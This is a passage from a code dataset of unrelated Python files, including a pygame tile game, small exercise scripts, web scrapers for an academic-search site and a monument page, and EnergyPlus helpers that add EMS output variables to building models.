Tile('empty', x, y)\n new_player = Player(x, y)\n Tile('npc', x + 1, y + 1)\n elif level[y][x] == '*':\n Tile('empty', x, y)\n cash_m.append(Tile('cash', x, y))\n elif level[y][x] == '$':\n Tile('box_black', x, y)\n elif level[y][x] == '?':\n Tile('empty', x, y)\n Tile('npc', x, y)\n\n\n return new_player\n\ndef cvest_nps():\n chotchik = 0\n proverochra_na_petyxa = False\n\n if pygame.sprite.spritecollideany(player, nps_group):\n intro_text = [\"КВЕСТ ПОЛУЧЕН\", \"------\",\n \"СОБЕРИТЕ 50 МОНЕТ И ВАМ\",\n \"ОТКРОЕТСЯ ТАЙНА МИРОЗДАНИЯ\"]\n if pygame.sprite.spritecollideany(player, money_group) != None:\n chotchik += 1\n if chotchik == 50:\n proverochra_na_petyxa = True\n\n\n font = pygame.font.Font(None, 100)\n text_coord = 50\n for line in intro_text:\n string_rendered = font.render(line, 1, 
pygame.Color('black'))\n intro_rect = string_rendered.get_rect()\n text_coord += 10\n intro_rect.top = text_coord\n intro_rect.x = 10\n text_coord += intro_rect.height\n screen.blit(string_rendered, intro_rect)\n\n\n\n\ntile_images = {\n 'wall': load_image('box.png'),\n 'empty': load_image('grass.png'),\n 'player': load_image('mario.png'),\n 'cash': load_image('money.png'),\n 'box_black': load_image('box_black.png'),\n 'npc': load_image('npc.png'),\n 'star': load_image('star.png')\n}\n\nclass Tile(pygame.sprite.Sprite):\n def __init__(self, tile_type, pos_x, pos_y):\n if tile_type == 'wall':\n super().__init__(tiles_group, box_group, all_sprites)\n elif tile_type == 'cash':\n super().__init__(money_group, all_sprites)\n elif tile_type == 'box_black':\n super().__init__(box_black_group, all_sprites, tiles_group)\n elif tile_type == 'npc':\n super().__init__(nps_group, all_sprites)\n elif tile_type == 'star':\n super().__init__(star_group, all_sprites)\n else:\n super().__init__(tiles_group, all_sprites)\n self.image = tile_images[tile_type]\n self.rect = self.image.get_rect().move(TILE_WIDTH * pos_x,\n TILE_HEIGHT * pos_y)\n\n\nclass Player(pygame.sprite.Sprite):\n def __init__(self, pos_x, pos_y):\n super().__init__(player_group, all_sprites)\n self.image = tile_images['player']\n self.rect = self.image.get_rect().move(TILE_WIDTH * pos_x + 15,\n TILE_HEIGHT * pos_y + 5)\n\nclass Camera:\n def __init__(self):\n self.dx = 0\n self.dy = 0\n\n def apply(self, obj): # перемещение любого спрайта\n obj.rect.x += self.dx\n obj.rect.y += self.dy\n\n def update(self, target): # следит за персонажем\n self.dx = -(target.rect.x + target.rect.w // 2 - WIDTH // 2)\n self.dy = -(target.rect.y + target.rect.h // 2 - HEIGHT // 2)\n\n\nstart_screen()\n\nplayer = generate_level(a)\ncamera = Camera()\n\npressed_left = pressed_right = pressed_up = pressed_down = False\nrunning = True\nscreen1 = pygame.transform.scale(load_image('grass.png'), (WIDTH, HEIGHT))\nscreen.blit(screen1, (0, 
0))\nwhile running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n elif event.type == pygame.KEYDOWN: # check for key presses\n if event.key == pygame.K_LEFT: # left arrow turns left\n pressed_left = True\n elif event.key == pygame.K_RIGHT: # right arrow turns right\n pressed_right = True\n elif event.key == pygame.K_UP: # up arrow goes up\n pressed_up = True\n elif event.key == pygame.K_DOWN: # down arrow goes down\n pressed_down = True\n elif event.type == pygame.KEYUP: # check for key releases\n if event.key == pygame.K_LEFT: # left arrow turns left\n pressed_left = False\n elif event.key == pygame.K_RIGHT: # right arrow turns right\n pressed_right = False\n elif event.key == pygame.K_UP: # up arrow goes up\n pressed_up = False\n elif event.key == pygame.K_DOWN: # down arrow goes down\n pressed_down = False\n print(money_group.sprites())\n # In your game loop, check for key states:\n for i in range(len(cash_m)):\n f = random.randint(1, 150)\n d1, d2 = 0, 0\n if 1 < f < 25 and pygame.sprite.spritecollideany(cash_m[i], box_black_group) == None:\n cash_m[i].rect.x += 15\n d1 = 15\n if 26 < f < 50 and pygame.sprite.spritecollideany(cash_m[i], box_black_group) == None:\n cash_m[i].rect.x -= 15\n d1 = -15\n if 51 < f < 75 and pygame.sprite.spritecollideany(cash_m[i], box_black_group) == None:\n cash_m[i].rect.y += 15\n d2 = 15\n if 76 < f < 100 and pygame.sprite.spritecollideany(cash_m[i], box_black_group) == None:\n cash_m[i].rect.y -= 15\n d2 = -15\n if pygame.sprite.spritecollideany(cash_m[i], box_black_group) != None:\n if d1 == 0:\n cash_m[i].rect.y += d2 * -1\n else:\n cash_m[i].rect.x += d1 * -1\n if pressed_left:\n player.rect.x -= STEP\n if pygame.sprite.spritecollideany(player, box_group) != None or \\\n pygame.sprite.spritecollideany(player, box_black_group) != None:\n player.rect.x += STEP\n elif pygame.sprite.spritecollideany(player, money_group) != None:\n pygame.sprite.spritecollideany(player, 
money_group).kill()\n if pressed_right:\n player.rect.x += STEP\n if pygame.sprite.spritecollideany(player, box_group) != None or \\\n pygame.sprite.spritecollideany(player, box_black_group) != None:\n player.rect.x -= STEP\n elif pygame.sprite.spritecollideany(player, money_group) != None:\n pygame.sprite.spritecollideany(player, money_group).kill()\n if pressed_up:\n player.rect.y -= STEP\n if pygame.sprite.spritecollideany(player, box_group) != None or \\\n pygame.sprite.spritecollideany(player, box_black_group) != None:\n player.rect.y += STEP\n elif pygame.sprite.spritecollideany(player, money_group) != None:\n pygame.sprite.spritecollideany(player, money_group).kill()\n if pressed_down:\n player.rect.y += STEP\n if pygame.sprite.spritecollideany(player, box_group) != None or \\\n pygame.sprite.spritecollideany(player, box_black_group) != None:\n player.rect.y -= STEP\n elif pygame.sprite.spritecollideany(player, money_group) != None:\n pygame.sprite.spritecollideany(player, money_group).kill()\n\n camera.update(player)\n for sprite in all_sprites:\n camera.apply(sprite)\n\n\n tiles_group.draw(screen)\n player_group.draw(screen)\n money_group.draw(screen)\n box_black_group.draw(screen)\n nps_group.draw(screen)\n star_group.draw(screen)\n cvest_nps()\n pygame.display.flip()\n clock.tick(FPS)\nterminate()\n","sub_path":"1321.py","file_name":"1321.py","file_ext":"py","file_size_in_byte":10667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"487149824","text":"#!/usr/bin/env python3\n\ndef f(n):\n try:\n x = 4 / n\n print('x =', x)\n except ZeroDivisionError as e:\n print('in except block,', e)\n else:\n print('in else block')\n finally:\n print('in finally block')\n\nf(2)\n\nprint()\n\nf(0)\n","sub_path":"22_try_catch.py","file_name":"22_try_catch.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} 
+{"seq_id":"162602588","text":"\"\"\"\n\nDIFFICULTY: SIMPLE\n\nStephen's speech module is broken. This module is responsible for his number pronunciation. He has to click to input all of the numerical digits in a figure, so when there are big numbers it can take him a long time. Help the robot to speak properly and increase his number processing speed by writing a new speech module for him. All the words in the string must be separated by exactly one space character. Be careful with spaces -- it's hard to see if you place two spaces instead one.\nInput: A number as an integer.\nOutput: The string representation of the number as a string.\nHow it is used: This concept may be useful for the speech synthesis software or automatic reports systems. This system can also be used when writing a chatbot by assigning words or phrases numerical values and having a system retrieve responses based on those values.\nPrecondition: 0 < number < 1000\n\"\"\"\n\nFIRST_TEN = {\n \"1\": \"one\",\n \"2\": \"two\",\n \"3\": \"three\",\n \"4\": \"four\",\n \"5\": \"five\",\n \"6\": \"six\",\n \"7\": \"seven\",\n \"8\": \"eight\",\n \"9\": \"nine\"\n }\nSECOND_TEN = {\n \"10\": \"ten\",\n \"11\": \"eleven\",\n \"12\": \"twelve\",\n \"13\": \"thirteen\",\n \"14\": \"fourteen\",\n \"15\": \"fifteen\",\n \"16\": \"sixteen\",\n \"17\": \"seventeen\",\n \"18\": \"eighteen\",\n \"19\": \"nineteen\"\n }\nOTHER_TENS = {\n \"20\": \"twenty\",\n \"30\": \"thirty\",\n \"40\": \"forty\",\n \"50\": \"fifty\",\n \"60\": \"sixty\",\n \"70\": \"seventy\",\n \"80\": \"eighty\",\n \"90\": \"ninety\"\n }\nHUNDRED = \"hundred\"\n\ndef checkio(number):\n STR_NUM = str(number)\n LENGTH = len(STR_NUM)\n huns_dig = 0\n tens_dig = 0\n ones_dig = 0\n two_dig = 0\n final_str = \"\"\n \n if LENGTH == 1:\n final_str = FIRST_TEN[STR_NUM]\n \n if LENGTH == 2:\n if STR_NUM in SECOND_TEN:\n return SECOND_TEN[STR_NUM]\n else:\n tens_dig = number // 10 * 10\n ones_dig = number % 10\n final_str = OTHER_TENS[str(tens_dig)]\n 
if ones_dig != 0:\n final_str = final_str + \" \" + FIRST_TEN[str(ones_dig)]\n \n if LENGTH == 3:\n \n huns_dig = number // 100\n two_dig = number % 100\n tens_dig = number % 100 // 10 * 10\n ones_dig = number % 10\n \n final_str = FIRST_TEN[str(huns_dig)] + \" \" + HUNDRED\n \n if str(two_dig) in SECOND_TEN:\n final_str = final_str + \" \" + SECOND_TEN[str(two_dig)]\n \n if tens_dig != 0 and str(two_dig) not in SECOND_TEN:\n final_str = final_str + \" \" + OTHER_TENS[str(tens_dig)]\n \n if ones_dig != 0 and str(two_dig) not in SECOND_TEN:\n final_str = final_str + \" \" + FIRST_TEN[str(ones_dig)]\n return final_str\nif __name__ == '__main__':\n #These \"asserts\" using only for self-checking and not necessary for auto-testing\n assert checkio(4) == 'four', \"1st example\"\n assert checkio(133) == 'one hundred thirty three', \"2nd example\"\n assert checkio(12) == 'twelve', \"3rd example\"\n assert checkio(101) == 'one hundred one', \"4th example\"\n assert checkio(212) == 'two hundred twelve', \"5th example\"\n assert checkio(40) == 'forty', \"6th example\"\n assert not checkio(212).endswith(' '), \"Don't forget strip whitespaces at the end of string\"\n","sub_path":"home/speech_module.py","file_name":"speech_module.py","file_ext":"py","file_size_in_byte":3295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"596001711","text":"# from pathlib import Path\n#\n# p = Path('/tmp/test20200630.csv')\n# parent = p.parent\n# if not parent.exists():\n# parent.mkdir(parents=True)\n#\n# csv_body = '''\\\n# id,name,age,comment\n# 1,zs,18,\"I'm 18\"\n# 2,ls,20,\"this is a \"\"test\"\"string.\"\n# 3,ww,23,\"你好\n#\n# 计算机\n# \"\n# '''\n# p.write_text(csv_body)\n#\n# import csv\n#\n# p = Path('/tmp/test20200630.csv')\n# with open(str(p)) as f:\n# reader = csv.reader(f)\n# print(next(reader))\n# print(next(reader))\n#\n# rows = [\n# \t[4,'tom',22,'tom'],\n# \t(5,'jerry',24,'jerry'),\n# \t(6,'justin',22,'just\\t\"in'),\n# 
\t\"abcdefghi\",\n# \t((1,),(2,))\n# ]\n#\n# row = rows[0]\n# with open(str(p), 'a') as f:\n# writer = csv.writer(f)\n# writer.writerow(row)\n# writer.writerows(rows)\n# ===================================================\n# 处理ini文件\nfrom configparser import ConfigParser\n\nfilename = '/tmp/test.ini'\nnewfilename = '/tmp/mysql.ini'\n\ncfg = ConfigParser()\ncfg.read(filename)\n# print(cfg.sections())\n# print(cfg.has_section('client'))\n#\n# print(cfg.items('mysqld'))\n# for k,v in cfg.items():\n # print(k, type(v))\n # print(k, cfg.items(k))\n#\n# tmp = cfg.get('mysqld','port')\n# print(type(tmp), tmp)\n# print(cfg.get('mysqld', 'a'))\n# print(cfg.get('mysqld', 'magedu', fallback='python'))\n#\n# tmp = cfg.getint('mysqld', 'port')\n# print(type(tmp), tmp)\n#\nif cfg.has_section('test'):\n cfg.remove_section('test')\n\ncfg.add_section('test')\ncfg.set('test', 'test1', '1')\ncfg.set('test', 'test2', '2')\n\nwith open(newfilename, 'w') as f:\n cfg.write(f)\n\n# print(cfg.getint('test', 'test2'))\ncfg.remove_option('test', 'test2')\n\ncfg['test']['x'] = '100'\ncfg['test2'] = {'test2':'1000'}\n\n# print('x' in cfg['test'])\n# print('x' in cfg['test2'])\n#\nprint(cfg._dict)\n#\n# with open(newfilename, 'w') as f:\n# cfg.write(f)","sub_path":"练习/处理csv与ini文件/处理csv与ini文件.py","file_name":"处理csv与ini��件.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"446993883","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\nimport requests\nimport json\n\n# URL = 'http://www.wanfangdata.com.cn/searchResult/getCoreSearch.do?d=0.1815591873188529'\n# headers = {\n# \"User-Agent\": 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36',\n# \"Content-Type\": \"application/x-www-form-urlencoded; charset=UTF-8\"\n# }\n# datas = {\n# \"paramStrs\": \"主题:(汉韩)\",\n# \"classType\": \"degree-degree_artical\",\n# \"pageNum\": 1,\n# 
\"pageSize\": 20,\n# \"isSearchSecond\": \"false\",\n# \"chineseEnglishExpand\": \"false\",\n# \"topicExpand\": \"false\",\n# \"searchWay\": \"AdvancedSearch\",\n# \"corePerio\": \"false\",\n# }\n#\n# session = requests.session()\n# res = session.post(URL, data=datas, headers=headers)\n# data = res.content.decode()\n# print(data)\n\n# id_list = []\n#\n# num = 22\n# for page_id in range(1, num):\n#\n# datas = {\n# \"paramStrs\": \"主题:(汉韩)\",\n# \"classType\": \"degree-degree_artical\",\n# \"pageNum\": page_id,\n# \"pageSize\": 20,\n# \"isSearchSecond\": \"false\",\n# \"chineseEnglishExpand\": \"false\",\n# \"topicExpand\": \"false\",\n# \"searchWay\": \"AdvancedSearch\",\n# \"corePerio\": \"false\",\n# }\n#\n# session = requests.session()\n# res = session.post(URL, data=datas, headers=headers)\n# data = res.content.decode()\n# print(data)\n# # info = json.loads(data)\n# # for thesisnum in info['pageRow']:\n# # id_list.append(thesisnum['id'])\n# # print('第{}页:'.format(page_id))\n\n\n# url = 'http://d.wanfangdata.com.cn/Detail/Thesis/'\n# headers = {\n# \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36\",\n# \"Content-Type\": \"application/json;charset=UTF-8\",\n# \"Host\":\"d.wanfangdata.com.cn\"\n# }\n# body = {\n# \"Id\": \"D048000\"\n# }\n#\n# res = requests.post(url, headers=headers, json=body)\n# data = res.content.decode()\n# print(data)\n\n\nurl = ' http://d.wanfangdata.com.cn/Detail/Thesis/' # 坑,一定要从requests URL复制\n\nheaders = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36\",\n \"Content-Type\": \"application/json;charset=UTF-8\",\n \"Host\": \"d.wanfangdata.com.cn\"\n}\nbody = {\n \"Id\": \"D048000\"\n}\n\njson_list = []\nfor i in range(0, len(id_list) + 1):\n thesis_id = '{}'.format(i)\n body['ID'] = thesis_id\n res = requests.post(url, headers=headers, json=body)\n data = res.content.decode()\n 
print(data)\n info = json.loads(data)\n # print(info)\n json_infos = {\n \"文章标题\": info['detail'][0]['thesis']['Title'],\n \"关键词\": info['detail'][0]['thesis']['Keywords'],\n \"摘要\": info['detail'][0]['thesis']['Abstract'],\n \"作者\": info['detail'][0]['thesis']['Creator'],\n \"作者单位\": info['detail'][0]['thesis']['OrganizationNorm'],\n \"层次\": info['detail'][0]['thesis']['Degree'],\n \"专业\": info['detail'][0]['thesis']['Major'],\n \"导师\": info['detail'][0]['thesis']['Tutor'],\n\n \"链接\": 'http://d.wanfangdata.com.cn/Detail/Thesis/' + info['detail'][0]['thesis']['Id']\n # \"在线发表时间\":['pageRow'],#??\n }\n json_list.append(json_infos)\nprint(json_infos)\n","sub_path":"web_spider/get_wanfang_serach_data.py","file_name":"get_wanfang_serach_data.py","file_ext":"py","file_size_in_byte":3325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"590799873","text":"from urllib.request import urlopen, Request\r\nfrom bs4 import BeautifulSoup\r\nimport os\r\n\r\n\r\n\r\n\r\ntheurl = urlopen(Request(\"http://www.culturalindia.net/monuments/taj-mahal.html\", headers={'User-Agent': 'Mozilla'}))\r\nsoup = BeautifulSoup(theurl,\"html.parser\")\r\n\r\nheader=\"TAJ MAHAL\\n\"\r\nfile = open(os.path.expanduser(\"mm1.txt\"),\"wb\")\r\nfor record in soup.findAll(\"div\"):\r\n for data in record.findAll(\"p\"):\r\n set = data.text\r\n print(set)\r\n file.write(bytes(header, encoding=\"ascii\", errors='ignore'))\r\n file.write(bytes(set, encoding=\"ascii\", errors='ignore'))\r\n\r\nfile.close()\r\n\r\nf = open('mm1.txt', 'r+')\r\nn = f.read().replace(',', ',\\n')\r\nf.truncate(0)\r\nf.write(n)\r\nf.close()\r\n\r\n\r\n","sub_path":"searchengine/backenddata collector/monuments/monumentdescription.py","file_name":"monumentdescription.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"469550600","text":"# 
http://www.blog.pythonlibrary.org/2012/08/02/python-101-an-intro-to-logging/\r\n# otherMod.py\r\nimport logging, sys\r\n\r\n# module_logger = logging.getLogger(\"exampleApp.altroModulo\")\r\n# print globals()\r\n# print __file__\r\n# print __name__\r\n\r\nlogger = None\r\nloggerName = None\r\n\r\ndef initLog(logID):\r\n global loggerName, logger\r\n loggerName = logID + '.' + __name__\r\n logger = logging.getLogger(loggerName)\r\n\r\n#----------------------------------------------------------------------\r\ndef add(x, y):\r\n # global logger\r\n funcName = sys._getframe().f_code.co_name\r\n logger.info(\"added %s and %s to get %s\" % (x, y, x+y))\r\n\r\n # logger = logging.getLogger(loggerName + '.'+ funcName)\r\n # logger1 = logging.getLogger(loggerName + \".add\")\r\n # logger.info(\"added %s and %s to get %s\" % (x, y, x+y))\r\n\r\n # logger = logging.getLogger(\"exampleApp.otherMod2.add\")\r\n # logger.info(\"added %s and %s to get %s\" % (x, y, x+y))\r\n\r\n return x+y","sub_path":"LnLogger/Samples/YAML_newLogger/Modulo_02.py","file_name":"Modulo_02.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"226313290","text":"# @Author : Xavier Faure\n# @Email : xavierf@kth.se\n\nfrom eppy.results import readhtml\nimport esoreader\nimport os\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndef getOutputList(path,idf,OutputsFile):\n OutputsVar = {}\n OutputsVar['Var'] = []\n outputs = open(os.path.join(path,OutputsFile), 'r')\n Lines = outputs.readlines()\n for line in Lines:\n tofind = 'Reporting_Frequency ='\n if tofind in line:\n OutputsVar['Reportedfrequency'] = line[line.index(tofind)+len(tofind)+1:-1]\n if '## ' in line[:3]:\n var = line[3:][::-1]\n var2add = var[var.index('[')+2:var.index(',')][::-1]\n keep = True\n if 'People' in var2add and len(idf.idfobjects[\"PEOPLE\"])==0:\n keep = False\n if keep:\n OutputsVar['Var'].append(var2add)\n return 
OutputsVar\n\ndef AddOutputs(idf,building,path,EMSOutputs,OutputsFile):\n\n OutputsVar = getOutputList(path,idf,OutputsFile)\n #we shall start by removing all predclared outputes from the template\n predef = idf.idfobjects[\"OUTPUT:VARIABLE\"]\n for i in reversed(predef):\n idf.removeidfobject(i)\n idf.newidfobject(\n \"OUTPUT:DIAGNOSTICS\",\n Key_1=\"DISPLAYEXTRAWARNINGS\",\n )\n\n for var in OutputsVar['Var']:\n idf.newidfobject(\n \"OUTPUT:VARIABLE\",\n Variable_Name=var,\n Reporting_Frequency=OutputsVar['Reportedfrequency'],\n )\n zonelist = getHeatedZones(idf)\n if EMSOutputs:\n setEMS4MeanTemp(idf, zonelist, OutputsVar['Reportedfrequency'],EMSOutputs[0])\n setEMS4TotHeatPow(idf, building,zonelist, OutputsVar['Reportedfrequency'], EMSOutputs[1])\n if len(EMSOutputs)>2:\n setEMS4TotDHWPow(idf, building, zonelist, OutputsVar['Reportedfrequency'], EMSOutputs[2])\n return idf\n\ndef getHeatedZones(idf):\n #returns the zone names that are above ground levels, which means heated zones\n zoneName = []\n AllZone = idf.idfobjects[\"ZONE\"]\n for idx, zone in enumerate(AllZone):\n if int(zone.Name[zone.Name.find('Storey')+6:]) >= 0: #the name ends with Storey # so lets get the storey number this way\n zoneName.append(zone.Name)\n return zoneName\n\ndef setEMS4MeanTemp(idf,zonelist,Freq,name):\n #lets create the temperature sensors for each zones and catch their volume\n for idx,zone in enumerate(zonelist):\n idf.newidfobject(\n 'ENERGYMANAGEMENTSYSTEM:SENSOR',\n Name = 'T'+str(idx),\n OutputVariable_or_OutputMeter_Index_Key_Name = zone,\n OutputVariable_or_OutputMeter_Name = 'Zone Mean Air Temperature',\n )\n idf.newidfobject(\n 'ENERGYMANAGEMENTSYSTEM:INTERNALVARIABLE',\n Name = 'Vol'+str(idx),\n Internal_Data_Index_Key_Name = zone,\n Internal_Data_Type = 'Zone Air Volume'\n )\n #lets create the prgm collingManager\n idf.newidfobject(\n 'ENERGYMANAGEMENTSYSTEM:PROGRAMCALLINGMANAGER',\n Name='Average Building Temperature',\n 
EnergyPlus_Model_Calling_Point='EndOfZoneTimestepBeforeZoneReporting' ,\n Program_Name_1='AverageZoneTemps'\n )\n #lets create the global Variable\n idf.newidfobject(\n 'ENERGYMANAGEMENTSYSTEM:GLOBALVARIABLE',\n Erl_Variable_1_Name='AverageBuildingTemp' ,\n )\n #lets create the EMS Output Variable\n idf.newidfobject(\n 'ENERGYMANAGEMENTSYSTEM:OUTPUTVARIABLE',\n Name=name,\n EMS_Variable_Name='AverageBuildingTemp' ,\n Type_of_Data_in_Variable='Averaged',\n Update_Frequency = 'ZoneTimeStep'\n )\n #lets create the program\n listofTemp = ['T'+str(i) for i in range(len(zonelist))]\n listofVol = ['Vol' + str(i) for i in range(len(zonelist))]\n SumNumerator = ''\n SumDenominator = ''\n for idx,Temp in enumerate(listofTemp):\n SumNumerator = SumNumerator+Temp+'*'+listofVol[idx]+'+'\n SumDenominator = SumDenominator + listofVol[idx] + '+'\n idf.newidfobject(\n 'ENERGYMANAGEMENTSYSTEM:PROGRAM',\n Name='AverageZoneTemps',\n Program_Line_1='SET SumNumerator = '+SumNumerator[:-1],\n Program_Line_2='SET SumDenominator = '+SumDenominator[:-1],\n Program_Line_3='SET AverageBuildingTemp = SumNumerator / SumDenominator',\n )\n #lets create now the ouputs of this EMS\n idf.newidfobject(\n 'OUTPUT:ENERGYMANAGEMENTSYSTEM',\n Actuator_Availability_Dictionary_Reporting='Verbose',\n EMS_Runtime_Language_Debug_Output_Level='Verbose',\n Internal_Variable_Availability_Dictionary_Reporting='Verbose',\n )\n #lets create now the final outputs\n idf.newidfobject(\n 'OUTPUT:VARIABLE',\n Variable_Name=name,\n Reporting_Frequency=Freq,\n )\n\ndef setEMS4TotHeatPow(idf,building,zonelist,Freq,name):\n #lets create the temperature sensors for each zones and catch their volume\n for idx,zone in enumerate(zonelist):\n idf.newidfobject(\n 'ENERGYMANAGEMENTSYSTEM:SENSOR',\n Name = 'Pow'+str(idx),\n OutputVariable_or_OutputMeter_Index_Key_Name = zone+' IDEAL LOADS AIR SYSTEM',\n OutputVariable_or_OutputMeter_Name = 'Zone Ideal Loads Supply Air Total Heating Rate'\n )\n #lets create the prgm 
collingManager\n idf.newidfobject(\n 'ENERGYMANAGEMENTSYSTEM:PROGRAMCALLINGMANAGER',\n Name='Compute Total Building Heat Pow',\n EnergyPlus_Model_Calling_Point='EndOfZoneTimestepBeforeZoneReporting' ,\n Program_Name_1='TotZonePow'\n )\n #lets create the global Variable\n idf.newidfobject(\n 'ENERGYMANAGEMENTSYSTEM:GLOBALVARIABLE',\n Erl_Variable_1_Name='TotBuildPow' ,\n )\n #lets create the EMS Output Variable\n idf.newidfobject(\n 'ENERGYMANAGEMENTSYSTEM:OUTPUTVARIABLE',\n Name=name,\n EMS_Variable_Name='TotBuildPow' ,\n Type_of_Data_in_Variable='Averaged',\n Update_Frequency = 'ZoneTimeStep'\n )\n #lets create the program\n listofPow = ['Pow'+str(i) for i in range(len(zonelist))]\n SumNumerator = ''\n for idx,Pow in enumerate(listofPow):\n SumNumerator = SumNumerator+Pow+'+'\n idf.newidfobject(\n 'ENERGYMANAGEMENTSYSTEM:PROGRAM',\n Name='TotZonePow',\n Program_Line_1='SET TotBuildPow = '+ SumNumerator[:-1],\n )\n #to uncomment if the EMS is not created before for the mean air tempeatrue\n # #lets create now the ouputs of this EMS\n # idf.newidfobject(\n # 'OUTPUT:ENERGYMANAGEMENTSYSTEM',\n # Actuator_Availability_Dictionary_Reporting='Verbose',\n # EMS_Runtime_Language_Debug_Output_Level='Verbose',\n # Internal_Variable_Availability_Dictionary_Reporting='Verbose',\n # )\n\n #lets create now the final outputs\n idf.newidfobject(\n 'OUTPUT:VARIABLE',\n Variable_Name=name,\n Reporting_Frequency=Freq,\n )\n\ndef setEMS4TotDHWPow(idf,building,zonelist,Freq,name):\n #lets create the temperature sensors for each zones and catch their volume\n idf.newidfobject(\n 'ENERGYMANAGEMENTSYSTEM:SENSOR',\n Name = 'DHWPow',\n OutputVariable_or_OutputMeter_Index_Key_Name = 'DHW',\n OutputVariable_or_OutputMeter_Name = 'Water Use Equipment Heating Rate'\n )\n\n #lets create the prgm collingManager\n idf.newidfobject(\n 'ENERGYMANAGEMENTSYSTEM:PROGRAMCALLINGMANAGER',\n Name='Compute Total DHW Heat Pow',\n EnergyPlus_Model_Calling_Point='EndOfZoneTimestepBeforeZoneReporting' ,\n 
Program_Name_1='prgmDHWPow'\n )\n #lets create the global Variable\n idf.newidfobject(\n 'ENERGYMANAGEMENTSYSTEM:GLOBALVARIABLE',\n Erl_Variable_1_Name='TotDHWPow' ,\n )\n #lets create the EMS Output Variable\n idf.newidfobject(\n 'ENERGYMANAGEMENTSYSTEM:OUTPUTVARIABLE',\n Name=name,\n EMS_Variable_Name='TotDHWPow' ,\n Type_of_Data_in_Variable='Averaged',\n Update_Frequency = 'ZoneTimeStep'\n )\n #lets create the program\n SumNumerator = 'DHWPow'\n idf.newidfobject(\n 'ENERGYMANAGEMENTSYSTEM:PROGRAM',\n Name='prgmDHWPow',\n Program_Line_1='SET TotDHWPow = '+ SumNumerator,\n )\n #to uncomment if the EMS is not created before for the mean air tempeatrue\n # #lets create now the ouputs of this EMS\n # idf.newidfobject(\n # 'OUTPUT:ENERGYMANAGEMENTSYSTEM',\n # Actuator_Availability_Dictionary_Reporting='Verbose',\n # EMS_Runtime_Language_Debug_Output_Level='Verbose',\n # Internal_Variable_Availability_Dictionary_Reporting='Verbose',\n # )\n\n #lets create now the final outputs\n idf.newidfobject(\n 'OUTPUT:VARIABLE',\n Variable_Name=name,\n Reporting_Frequency=Freq,\n )\n\ndef Read_OutputsEso(CaseName,ExtSurfNames, ZoneOutput):\n #visualization of the results\n eso = esoreader.read_from_path(CaseName)\n ZoneAgregRes = {}\n BuildAgregRes = {}\n #We agregate results per storey\n res ={}\n for idx in eso.dd.variables.keys():\n currentData = eso.dd.variables[idx]\n if 'Surface' in currentData[2] and currentData[1] not in ExtSurfNames:\n continue\n if currentData[1].find('STOREY')>0:\n try:\n nb = int(currentData[1][currentData[1].find('STOREY')+6:])\n except:\n test = 1\n finished = 0\n while finished == 0:\n try:\n nb = int(currentData[1][currentData[1].find('STOREY')+6:-test])\n finished = 1\n except:\n test += 1\n Firstkey = 'STOREY '+str(nb)\n else:\n Firstkey = currentData[1]\n if not res:\n res[Firstkey] = {}\n ZoneAgregRes[Firstkey] = {} #currentData[1]\n if not currentData[1] in res.keys():\n findsame = 0\n for key in res.keys():\n if currentData[1] in key or key 
in currentData[1]:\n Firstkey = key\n findsame = 1\n if not findsame:\n res[Firstkey] = {}\n ZoneAgregRes[Firstkey] = {}\n if not currentData[2] in res[Firstkey].keys():\n res[Firstkey][currentData[2]] = {}\n ZoneAgregRes[Firstkey][currentData[2]] = {}\n res[Firstkey][currentData[2]]['Data'] = []\n res[Firstkey][currentData[2]]['Data'].append(eso.data[idx])\n res[Firstkey][currentData[2]]['TimeStep'] = currentData[0]\n res[Firstkey][currentData[2]]['Unit'] = currentData[3]\n BuildAgregRes['HeatedArea']= {}\n BuildAgregRes['NonHeatedArea'] = {}\n BuildAgregRes['Other']= {}\n for nb, key in enumerate(res):\n KeyArea = 'Other'\n if 'STOREY' in key:\n numstor= int(key[6:])\n KeyArea= 'NonHeatedArea' if numstor<0 else 'HeatedArea'\n for j, i in enumerate(res[key]):\n ZoneAgregRes[key][i]['GlobData'] = []\n ZoneAgregRes[key][i]['TimeStep'] = res[key][i]['TimeStep']\n ZoneAgregRes[key][i]['Unit'] = res[key][i]['Unit']\n ZoneAgregRes[key][i]['NbNode'] = len(res[key][i]['Data'])\n #here I need to introduce some filtering in order to catch only outside facing surfaces (to compare core/perimeter thermal zoning woth other kind\n if res[key][i]['Unit'] in {'C','W/m2-K','W/m2'}: #then lets compute the mean, if not lets sum it\n for ii in zip(*res[key][i]['Data']):\n ZoneAgregRes[key][i]['GlobData'].append(sum(ii)/len(res[key][i]['Data']))\n else:\n for ii in zip(*res[key][i]['Data']):\n ZoneAgregRes[key][i]['GlobData'].append(sum(ii))\n #lets deal with data now at the building level\n if not i in BuildAgregRes[KeyArea].keys():\n BuildAgregRes[KeyArea][i] = {}\n BuildAgregRes[KeyArea][i]['GlobData'] = ZoneAgregRes[key][i]['GlobData']\n BuildAgregRes[KeyArea][i]['TimeStep'] = ZoneAgregRes[key][i]['TimeStep']\n BuildAgregRes[KeyArea][i]['Unit'] = ZoneAgregRes[key][i]['Unit']\n BuildAgregRes[KeyArea][i]['NbNode'] = ZoneAgregRes[key][i]['NbNode']\n else:\n if 